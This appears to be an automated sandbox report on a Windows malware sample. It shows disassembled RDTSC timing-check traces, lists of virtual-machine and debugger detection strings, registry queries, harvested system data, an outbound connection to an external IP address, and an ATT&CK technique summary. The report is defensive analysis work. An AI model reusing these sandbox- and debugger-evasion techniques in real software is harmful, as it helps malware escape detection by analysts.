Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1613 second address: 6DA1619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1619 second address: 6DA1636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1636 second address: 6DA167D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c jmp 00007FE80149857Dh 0x00000011 mov word ptr [edx+32h], ax 0x00000015 jmp 00007FE80149857Eh 0x0000001a mov eax, dword ptr [esi+34h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE801498587h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA167D second address: 6DA16AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80147ABFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16AC second address: 6DA16B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16B2 second address: 6DA16B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA16B6 second address: 6DA1733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov bl, EFh 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 jne 00007FE86F4F65C3h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FE801498586h 0x00000021 sub ecx, 47ECCA58h 0x00000027 jmp 00007FE80149857Bh 0x0000002c popfd 0x0000002d mov si, B30Fh 0x00000031 popad 0x00000032 or dword ptr [edx+38h], FFFFFFFFh 0x00000036 jmp 00007FE801498582h 0x0000003b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003f jmp 00007FE801498580h 0x00000044 or dword ptr [edx+40h], FFFFFFFFh 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1733 second address: 6DA1737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1737 second address: 6DA173D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA173D second address: 6DA1743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1743 second address: 6DA1747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1747 second address: 6DA176B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE80147AC09h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA176B second address: 6DA1771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1771 second address: 6DA17A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE80147ABFFh 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE80147AC05h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0BF6 second address: 6DF0C09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0C09 second address: 6DF0C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DF0C1C second address: 6DF0C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE80149857Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ax, 6863h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D90897 second address: 6D908D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 529Bh 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 mov eax, edx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b jmp 00007FE80147AC03h 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908D4 second address: 6D908D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908D8 second address: 6D908F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6D908F3 second address: 6D908FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 85h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D908FA second address: 6D9091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147AC06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D9091C second address: 6D90922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D306C4 second address: 6D30720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80147AC07h 0x00000009 and cl, 0000005Eh 0x0000000c jmp 00007FE80147AC09h 0x00000011 popfd 0x00000012 jmp 00007FE80147AC00h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE80147ABFEh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30AB8 second address: 6D30AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, C893h 0x0000000f call 00007FE801498588h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30AED second address: 6D30B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE80147ABFEh 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE80147ABFEh 0x00000014 or eax, 18A71778h 0x0000001a jmp 00007FE80147ABFBh 0x0000001f popfd 0x00000020 mov si, 0EAFh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30B32 second address: 6D30B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30B36 second address: 6D30B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30B3C second address: 6D30B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30B42 second address: 6D30B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D30B46 second address: 6D30B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C15 second address: 6D80C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C19 second address: 6D80C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C1F second address: 6D80C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C25 second address: 6D80C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C29 second address: 6D80C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov al, 34h 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov cx, B2E9h 0x00000016 mov eax, 4EFC94A5h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FE80147AC00h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FE80147AC00h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C6E second address: 6D80C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498583h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C86 second address: 6D80C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80C8C second address: 6D80C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D60012 second address: 6D6003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE80147AC06h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D6003F second address: 6D60043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D60043 second address: 6D6005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D6005F second address: 6D600A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d push ecx 0x0000000e mov dx, 3112h 0x00000012 pop edi 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FE801498586h 0x0000001b and esp, FFFFFFF0h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE80149857Ch 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D600A4 second address: 6D600D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 pushfd 0x00000012 jmp 00007FE80147AC00h 0x00000017 or esi, 200DBAB8h 0x0000001d jmp 00007FE80147ABFBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D600D9 second address: 6D60117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE80149857Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE80149857Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D60117 second address: 6D6011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D6011D second address: 6D60147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE801498587h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D60147 second address: 6D6014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D6014D second address: 6D6017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FE80149857Ch 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007FE801498580h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D602AC second address: 6D602B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D602B0 second address: 6D602B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D602B4 second address: 6D602BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D602BA second address: 6D602C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D602C9 second address: 6D60314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007FE80147AC05h 0x0000000e pop esi 0x0000000f jmp 00007FE80147ABFEh 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b jmp 00007FE80147AC06h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D60314 second address: 6D60326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 6D80AB2 second address: 6D80AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147ABFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Special instruction interceptor: First address: 10F9349 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Special instruction interceptor: First address: 118191A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Code function: 0_2_00B19980 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Code function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses (listed twice)
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Code function: 0_2_009329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle": "nngOKyDthKXbiU.exe", "pid": 7176 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7196 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7220 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7244 }, { "name": "nngOKyDthKXbiU.exe", "pid": 7268 }, { "name": "1o81tDUu5M.exe", "pid": 7600 } ], "uptime_minutes": 98, "installed_apps": [ { "app_name": "Google Chrome", "index": 0 }, { "app_name": "Microsoft Edge", "index": 1 }, { "app_name": "Microsoft Edge Update", "index": 2
Source: 1o81tDUu5M.exe | Binary or memory string: Hyper-V RAW
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1o81tDUu5M.exe, 00000000.00000003.1748157172.0000000001643000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Code function: 0_2_06D70939 Start: 06D70A0A End: 06D70A04
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File opened: NTICE
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File opened: SICE
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Process queried: DebugPort (listed 3 times)
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Code function: 0_2_00B19980 rdtsc
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 0|Program Manager
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (listed twice)
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 147.45.113.159:80
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
1o81tDUu5M.exe | 58% | Virustotal |
